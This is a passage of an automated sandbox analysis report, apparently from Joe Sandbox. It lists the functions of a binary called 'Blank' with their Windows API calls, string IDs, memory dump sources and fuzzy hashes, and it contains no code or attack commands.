                                                                                                                                    • Opcode ID: b181a7911319e8073891367397025abbafde4715b4481114573b87f7c68575ee
                                                                                                                                    • Instruction ID: b91a80414ebc35e47f2703762d7c403e63c80221387a20fd602505b59e82d33b
                                                                                                                                    • Opcode Fuzzy Hash: b181a7911319e8073891367397025abbafde4715b4481114573b87f7c68575ee
                                                                                                                                    • Instruction Fuzzy Hash: FEB14B75A1020ADFDB15DFA8DD99BBE7BB4FB08314F104129FA15A7290DB70A8A1CF50
                                                                                                                                    Function 00280429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • GetForegroundWindow.USER32(002F0980,?,?,?,?,?), ref: 002804E3
                                                                                                                                    • IsWindow.USER32(?), ref: 002B66BB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Foreground_memmove
                                                                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                    • API String ID: 3828923867-1919597938
                                                                                                                                    • Opcode ID: e80b01760da1fcb1c757e9fd86d068087ec4dbda2fe8d86d1ec64b225f401fb5
                                                                                                                                    • Instruction ID: c5964c6d7410c3903d9efeb3bb69af88fde9e68d54683db2aa3e4581d11fdb7b
                                                                                                                                    • Opcode Fuzzy Hash: e80b01760da1fcb1c757e9fd86d068087ec4dbda2fe8d86d1ec64b225f401fb5
                                                                                                                                    • Instruction Fuzzy Hash: 80D1B2301256029BCB08EF60C4859EAFBB5FF54384F504A29F495875A2DB34E9B9CF92
                                                                                                                                    Function 002E441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002E44AC
                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002E456C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                    • API String ID: 3974292440-719923060
                                                                                                                                    • Opcode ID: 98222285df3071619de5bc6327ed855e85805c4cd97914dc8051b91ec335cbd6
                                                                                                                                    • Instruction ID: 9444efb3c5c1c0e7ba85989d3e3d5fff07561247a4eb9e48c04eea67657b2941
                                                                                                                                    • Opcode Fuzzy Hash: 98222285df3071619de5bc6327ed855e85805c4cd97914dc8051b91ec335cbd6
                                                                                                                                    • Instruction Fuzzy Hash: ABA1B0342742419FCB14FF21C891A6AB3A5EF89354F504928F8969B3D2DB30ED69CF91
                                                                                                                                    Function 002D56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 002D56E1
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 002D56EC
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 002D56F7
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 002D5702
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 002D570D
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 002D5718
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 002D5723
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 002D572E
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 002D5739
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 002D5744
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 002D574F
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 002D575A
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 002D5765
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 002D5770
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 002D577B
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 002D5786
                                                                                                                                    • GetCursorInfo.USER32(?), ref: 002D5796
                                                                                                                                    • GetLastError.KERNEL32(00000001,00000000), ref: 002D57C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3215588206-0
                                                                                                                                    • Opcode ID: 014d0af14028901c738f2c460a338e5e30d2b0f4c37f237a73fe7677a0f9542d
                                                                                                                                    • Instruction ID: 5c1c7c770c5de41c9ef7af7c4836c5df00141446f87c4467b6f9b421603ba178
                                                                                                                                    • Opcode Fuzzy Hash: 014d0af14028901c738f2c460a338e5e30d2b0f4c37f237a73fe7677a0f9542d
                                                                                                                                    • Instruction Fuzzy Hash: A6418770E04319AADB109FBACC49D6EFFF8EF41B50B10452FE109E7291DAB8A900CE51
                                                                                                                                    Function 002BB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002BB17B
                                                                                                                                    • __swprintf.LIBCMT ref: 002BB21C
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BB22F
                                                                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002BB284
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BB2C0
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 002BB2F7
                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 002BB349
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002BB37F
                                                                                                                                    • GetParent.USER32(?), ref: 002BB39D
                                                                                                                                    • ScreenToClient.USER32(00000000), ref: 002BB3A4
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002BB41E
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BB432
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 002BB458
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BB46C
                                                                                                                                      • Part of subcall function 0028385C: _iswctype.LIBCMT ref: 00283864
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                    • String ID: %s%u
                                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                                    • Opcode ID: d1100e786ea780af43c43ae9196406111e79a0900ab6458aa5289d77e1e86276
                                                                                                                                    • Instruction ID: b136095fb62d405bbbf18900326d2d8b7f15b74176b205b6c292632d0b4ef3b7
                                                                                                                                    • Opcode Fuzzy Hash: d1100e786ea780af43c43ae9196406111e79a0900ab6458aa5289d77e1e86276
                                                                                                                                    • Instruction Fuzzy Hash: B2A1EF71224207AFD716DF24C894BEAF7E8FF44394F008629F9A9C2191DB70E965CB91
                                                                                                                                    Function 002BBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 002BBAB1
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BBAC2
                                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 002BBAEA
                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 002BBB07
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BBB25
                                                                                                                                    • _wcsstr.LIBCMT ref: 002BBB36
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002BBB6E
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BBB7E
                                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 002BBBA5
                                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 002BBBEE
                                                                                                                                    • _wcscmp.LIBCMT ref: 002BBBFE
                                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 002BBC26
                                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 002BBC8F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                                    • Opcode ID: 6f8c82f3914152b8a8b715518f0bcd44a95babc8a773d5765660d3f75f68c349
                                                                                                                                    • Instruction ID: bfe2832da83c5b5a9e3fc486988e89dc4e652c622a44e1872dace67a235d56ff
                                                                                                                                    • Opcode Fuzzy Hash: 6f8c82f3914152b8a8b715518f0bcd44a95babc8a773d5765660d3f75f68c349
                                                                                                                                    • Instruction Fuzzy Hash: 4D81C2710242069FDB02DF14C885FEABBE8FF44394F04846AFD898A096DBB4DD65CB61
                                                                                                                                    Function 002BB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                    • Opcode ID: 52f5efc37221104468076e62c1e0c5ebdc7d34a2e7fea315a07c21674430ef71
                                                                                                                                    • Instruction ID: f0fa48369413b7b7eb4726b93b9efdc311c24af198a51de8d74f5f48ed69dde9
                                                                                                                                    • Opcode Fuzzy Hash: 52f5efc37221104468076e62c1e0c5ebdc7d34a2e7fea315a07c21674430ef71
                                                                                                                                    • Instruction Fuzzy Hash: 5531E330A61A06A6DB1BFB94CD03EED73A4AF14792F200129F545B10D6EFE56E348E52
                                                                                                                                    Function 002BCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 002BCBAA
                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002BCBBC
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 002BCBD3
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 002BCBE8
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 002BCBEE
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002BCBFE
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 002BCC04
                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002BCC25
                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002BCC3F
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002BCC48
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 002BCCB3
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002BCCB9
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002BCCC0
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002BCD0C
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 002BCD19
                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002BCD3E
                                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002BCD69
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3869813825-0
                                                                                                                                    • Opcode ID: dd64a1a904537529d7b81a732908c8f5c7d6fc78784f93738fc2f57b64f9010b
                                                                                                                                    • Instruction ID: 69a2dd576210c5f8f84458325b4f66adf053e3232b42e4c90faa2ca0dd05ad63
                                                                                                                                    • Opcode Fuzzy Hash: dd64a1a904537529d7b81a732908c8f5c7d6fc78784f93738fc2f57b64f9010b
                                                                                                                                    • Instruction Fuzzy Hash: 47516F7090070AEFDB209FA8DE89FAEBBF5FF04755F100529E546A25A1C774A914CF50
                                                                                                                                    Function 002EA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002EA87E
                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 002EA8F8
                                                                                                                                      • Part of subcall function 00271821: _memmove.LIBCMT ref: 0027185B
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002EA972
                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002EA994
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002EA9A7
                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 002EA9C9
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,?,00000000), ref: 002EAA00
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002EAA19
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002EAA32
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002EAA39
                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002EAA51
                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002EAA69
                                                                                                                                      • Part of subcall function 002629AB: GetWindowLongW.USER32(?,000000EB), ref: 002629BC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                                    • Opcode ID: b38925b21f439ae7c9def3ff799cd5fac9b44f64923b01d2f40e2344dc17ffd7
                                                                                                                                    • Instruction ID: e0b7ffee1bb270264b0bd57c818541dd0e3aafb7666b61053ea402bb484fa16c
                                                                                                                                    • Opcode Fuzzy Hash: b38925b21f439ae7c9def3ff799cd5fac9b44f64923b01d2f40e2344dc17ffd7
                                                                                                                                    • Instruction Fuzzy Hash: 867178711A0385AFD725CF28CC59F6A77E9FB88310F44452DF985873A2D770A922CB52
                                                                                                                                    Function 002ECCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002629E2: GetWindowLongW.USER32(?,000000EB), ref: 002629F3
                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 002ECCCF
                                                                                                                                      • Part of subcall function 002EB1A9: ClientToScreen.USER32(?,?), ref: 002EB1D2
                                                                                                                                      • Part of subcall function 002EB1A9: GetWindowRect.USER32(?,?), ref: 002EB248
                                                                                                                                      • Part of subcall function 002EB1A9: PtInRect.USER32(?,?,002EC6BC), ref: 002EB258
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002ECD38
                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002ECD43
                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002ECD66
                                                                                                                                    • _wcscat.LIBCMT ref: 002ECD96
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002ECDAD
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002ECDC6
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002ECDDD
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 002ECDFF
                                                                                                                                    • DragFinish.SHELL32(?), ref: 002ECE06
                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002ECEF9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                    • API String ID: 169749273-3440237614
                                                                                                                                    • Opcode ID: 9620c9f1ce9feb8593485c5ee51383081a547710e262b047cb48a3c60c43f458
                                                                                                                                    • Instruction ID: 934b6647f07ad7b8375c597d8e137375fb086c07d522f16eeedb60a90b96f49e
                                                                                                                                    • Opcode Fuzzy Hash: 9620c9f1ce9feb8593485c5ee51383081a547710e262b047cb48a3c60c43f458
                                                                                                                                    • Instruction Fuzzy Hash: 7061AA71518301AFC701EF94DC89DABBBE8FF88350F000A2DF595921A1DB709A59CF62
                                                                                                                                    Function 002C82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • #8.OLEAUT32(00000000,00000000,?,?,?,?,?,?,0000002A,00000000,002F0980), ref: 002C831A
                                                                                                                                    • #10.WSOCK32(00000000,?,?,?,?,?,?,0000002A,00000000,002F0980), ref: 002C8323
                                                                                                                                    • #9.WSOCK32(00000000,?,?,?,?,?,0000002A,00000000,002F0980), ref: 002C832F
                                                                                                                                    • #185.OLEAUT32(?,?,?,?,0000002A,00000000,002F0980), ref: 002C841D
                                                                                                                                    • __swprintf.LIBCMT ref: 002C844D
                                                                                                                                    • #220.OLEAUT32(?,?,?,?,?,00000029,00000000,Default), ref: 002C8479
                                                                                                                                    • #8.OLEAUT32(?,?,00000000,00000000), ref: 002C852A
                                                                                                                                    • #6.OLEAUT32(?,?), ref: 002C85BE
                                                                                                                                    • #9.WSOCK32(?), ref: 002C8618
                                                                                                                                    • #9.WSOCK32(?), ref: 002C8627
                                                                                                                                    • #8.OLEAUT32(00000000,00000000,?,00000000,00000000), ref: 002C8665
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: #185#220__swprintf
                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                    • API String ID: 2563594795-3931177956
                                                                                                                                    • Opcode ID: 779b21ec7fa75011ed3d3d002dbb73a93cf14b4390d695e3c222c7a43b2700d6
                                                                                                                                    • Instruction ID: fc89c2e572d1e8766e226ec445e8c084826da351b3b691a9864d16714f25e975
                                                                                                                                    • Opcode Fuzzy Hash: 779b21ec7fa75011ed3d3d002dbb73a93cf14b4390d695e3c222c7a43b2700d6
                                                                                                                                    • Instruction Fuzzy Hash: AED1D231624516EBDB209F65C884F7EBBB4BF45B00F24C299E4059B281DFB4EC64DB91
                                                                                                                                    Function 002E49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002E4A61
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002E4AAC
